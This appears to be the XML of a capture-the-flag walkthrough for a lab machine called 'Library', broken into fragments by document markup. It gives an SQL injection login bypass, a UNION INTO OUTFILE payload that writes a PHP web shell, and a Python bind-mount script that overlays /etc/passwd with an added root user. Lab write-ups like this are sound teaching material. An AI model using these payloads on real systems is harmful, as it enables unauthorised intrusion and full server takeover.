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LIBRARY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fxmzzmljo89c"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Nmap,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67000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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scan, we identified that only one web port was open: port 80.</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67"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several login attempts using default credentials such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin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guest:guest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc., without success, we performed a bypass using the SQLi payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' or 1=1-- - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and successfully authenticated into the application.</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4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observed that this is an online bookstore where it is possible to purchase books. An intriguing feature is the presence of a search field that we can use to look for books. Given this, the first thought that comes to mind is the possibility of SQL injection, especially after bypassing the login screen. The first task is to identify the number of columns.</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quickly discovered that there are 5 columns, and column 2 is reflected.</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46400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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obtain the database version:</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97200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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SQL injection confirmed, the next step is to acquire a shell. To achieve this, it is necessary to determine whether we have write permissions in the application’s document root or in another directory. After unsuccessful attempts to write a web shell into the application’s root directory, we decided to perform fuzzing and identified the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"assets"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. By writing a web shell into that directory, we succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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'union select 1,"&lt;?php system($_GET[0]);?&gt;",3,4,5 INTO outfile "/var/www/html/assets/wshell.php"-- -</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5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5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6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RCE on the server, the next step is to acquire a reverse shell. For this, we can use the following payload. However, it is crucial to remember to URL-encode it before use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://urlencode.org/</w:t>
        </w:r>
      </w:hyperlink>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39900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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Payload encoded:</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5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89100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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we receive the shell.</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4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fully interactive TTYs:</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47800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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root directory, we are able to obtain the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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30600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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retrieving our first user flag, it is time to escalate privileges to obtain the final flag. For this, we need to escalate to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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By running the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can identify that Python has the capability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cap_sys_admin</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95400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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According to the article mentioned below, we can establish a new user with the same capabilities as the root user by manipulating the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd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Exploiting Linux Capabilities – Part 3</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">In this post you will learn how to exploit the capabilities often provided to a sysadmin, for example cap_sys_admin, cap_sys_time, cap_kill and cap_chown</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hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://tbhaxor.com/exploiting-linux-capabilities-part-3/</w:t>
        </w:r>
      </w:hyperlink>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generating a new password using OpenSSL:</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33500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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we copy the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd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 to the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 and then add a new user with the same capabilities as root, using the previously defined password.</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printf 'pretty:$1$dFo2Prg5$pLfaDs2OJd0toE787NT0w.:0:0:root:/root:/bin/bash\n' &gt;&gt; passwd</w:t>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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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54400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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Through the provided exploit, we can mount our modified </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd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 Once this process is completed, we simply need to authenticate with our new user using the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With this, we will have access to our final flag located in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directory.</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from ctypes import *</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libc = CDLL("libc.so.6")</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libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)</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MS_BIND = 4096  # defined in /usr/include/sys/mount.h:55</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source = b"/tmp/passwd"</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target = b"/etc/passwd"</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filesystemtype = b"none"</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options = b"rw"</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mountflags = MS_BIND</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libc.mount(source, target, filesystemtype, mountflags, options)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943600" cy="1892300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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1892300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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D">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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4" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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E">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F">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7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Library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1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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tbhaxor.com/exploiting-linux-capabilities-part-3/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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9.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20.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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hyperlink" Target="https://urlencode.org/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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PFB6Vx92VUnDGx20a5g4GvTt2A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmZ4bXp6bWxqbzg5YzIOaC4xNzVmNWNzOTR6MG84AHIhMXh5NWU4U3M1ZGdIMGo3Um53YkpFcUhOQVVnX1N3amU0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